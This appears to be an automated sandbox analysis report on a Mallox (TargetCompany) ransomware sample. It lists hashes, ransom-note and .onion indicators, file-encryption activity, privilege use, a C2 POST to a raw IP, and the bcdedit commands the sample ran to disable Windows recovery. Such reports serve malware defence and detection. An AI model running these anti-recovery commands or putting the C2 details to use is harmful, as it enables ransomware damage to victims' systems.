Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
31/05/2024, 04:05 UTC
Static task
static1
Behavioral task
behavioral1
Sample
ld.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
ld.exe
Resource
win10v2004-20240426-en
General
-
Target
ld.exe
-
Size
478KB
-
MD5
71efe7a21da183c407682261612afc0f
-
SHA1
0f1aea2cf0c9f2de55d2b920618a5948c5e5e119
-
SHA256
45a236e7aa80515aafb6c656c758faad6e77fb435b35bfa407aef3918212078d
-
SHA512
3cff597dbd7f0d5ab45b04e3c3731e38626b7b082a0ede7ab9a7826921848edb3c033f640da2cb13916febf84164f7415ca9ac50c3d927f04d9b61fcadb7801c
-
SSDEEP
6144:W0wmbI4/Z4SHvrxw6zaIST1w9wEPDasWxxsBhS37b8o6XCFyPwCMa6qnXxq/y:7zv66zaISTW9asWxxAh4IlXC4PUqBq/
Malware Config
Extracted
C:\HOW TO BACK FILES.txt
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin
http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion
Signatures
-
TargetCompany,Mallox
TargetCompany (aka Mallox) is a ransomware which encrypts files using a combination of ChaCha20, AES-128, and Curve25519, first seen in June 2021.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3000 bcdedit.exe 292 bcdedit.exe -
Renames multiple (7221) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: ld.exe File opened (read-only) \??\R: ld.exe File opened (read-only) \??\S: ld.exe File opened (read-only) \??\V: ld.exe File opened (read-only) \??\Z: ld.exe File opened (read-only) \??\B: ld.exe File opened (read-only) \??\G: ld.exe File opened (read-only) \??\I: ld.exe File opened (read-only) \??\M: ld.exe File opened (read-only) \??\O: ld.exe File opened (read-only) \??\D: ld.exe File opened (read-only) \??\H: ld.exe File opened (read-only) \??\K: ld.exe File opened (read-only) \??\N: ld.exe File opened (read-only) \??\T: ld.exe File opened (read-only) \??\X: ld.exe File opened (read-only) \??\A: ld.exe File opened (read-only) \??\J: ld.exe File opened (read-only) \??\L: ld.exe File opened (read-only) \??\W: ld.exe File opened (read-only) \??\Y: ld.exe File opened (read-only) \??\E: ld.exe File opened (read-only) \??\P: ld.exe File opened (read-only) \??\U: ld.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 4 api.ipify.org -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Krasnoyarsk ld.exe File opened for modification C:\Program Files\Mozilla Firefox\installation_telemetry.json ld.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\soundcloud.luac ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\WINWORD_F_COL.HXK ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\WidescreenPresentation.potx ld.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\de-DE\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Median.thmx ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0228959.WMF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR8F.GIF ld.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14755_.GIF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\Msgbox.accdt ld.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ach\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra ld.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cayman ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\MSPUB.DEV_K_COL.HXK ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMask.bmp ld.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD10972_.GIF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02759J.JPG ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_FormsHomePage.gif ld.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00807_.WMF ld.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-windows.jar ld.exe File opened for modification C:\Program Files\Microsoft Games\More Games\de-DE\MoreGames.dll.mui ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EXCEL.DEV_K_COL.HXK ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBBA\MSPUB10.BDR ld.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099198.GIF ld.exe File created C:\Program Files (x86)\Microsoft Synchronization Services\HOW TO BACK FILES.txt ld.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_OFF.GIF ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar ld.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png ld.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\dkjson.luac ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar ld.exe File created C:\Program Files (x86)\Windows Media Player\Skins\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\DataViewIconImagesMask.bmp ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck.css ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPreviewTemplateRTL.html ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02749U.BMP ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Author2XML.XSL ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00077_.WMF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01750_.GIF ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLPERF.H ld.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\HOW TO BACK FILES.txt ld.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\HOW TO BACK FILES.txt ld.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich ld.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\ACWZUSR12.ACCDU ld.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 788 ld.exe 788 ld.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeDebugPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe Token: SeTakeOwnershipPrivilege 788 ld.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 788 wrote to memory of 852 788 ld.exe 28 PID 788 wrote to memory of 852 788 ld.exe 28 PID 788 wrote to memory of 852 788 ld.exe 28 PID 788 wrote to memory of 2272 788 ld.exe 30 PID 788 wrote to memory of 2272 788 ld.exe 30 PID 788 wrote to memory of 2272 788 ld.exe 30 PID 852 wrote to memory of 3000 852 cmd.exe 32 PID 852 wrote to memory of 3000 852 cmd.exe 32 PID 852 wrote to memory of 3000 852 cmd.exe 32 PID 2272 wrote to memory of 292 2272 cmd.exe 33 PID 2272 wrote to memory of 292 2272 cmd.exe 33 PID 2272 wrote to memory of 292 2272 cmd.exe 33 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" ld.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ld.exe"C:\Users\Admin\AppData\Local\Temp\ld.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:788 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\bcdedit.exebcdedit /set {current} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\system32\bcdedit.exebcdedit /set {current} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:292
-
-
Network
-
Remote address:8.8.8.8:53Requestapi.ipify.orgIN AResponseapi.ipify.orgIN A104.26.13.205api.ipify.orgIN A172.67.74.152api.ipify.orgIN A104.26.12.205
-
Remote address:104.26.13.205:80RequestGET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.ipify.org
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 14
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 88c41582cfc360f4-LHR
-
Remote address:91.215.85.135:80RequestPOST /QWEwqdsvsf/ap.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 91.215.85.135
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 31 May 2024 04:05:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.3-4ubuntu2.22
Vary: Accept-Encoding
-
152 B 3
-
413 B 402 B 6 4
HTTP Request
GET http://api.ipify.org/HTTP Response
200 -
617 B 471 B 6 5
HTTP Request
POST http://91.215.85.135/QWEwqdsvsf/ap.phpHTTP Response
200 -
152 B 3
-
152 B 3
-
152 B 3
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
910B
MD5a7b412d53744336e36379c3af0349d0a
SHA18a945c13343cec216b5a1c8b7b6554d61b61ce62
SHA256b86fbabb7ede0feb1ea3de4e865d63e5ec3b1bc1a7cf740a3504c315707049ab
SHA512f12cabb10812ebf7b9f4cdbb6888f4671f8f13a404a805cbfd4147f7184329de05b271041b51e5acd1a2af5bf8e87a4fd99cd5b7b3f074866405c527416407e1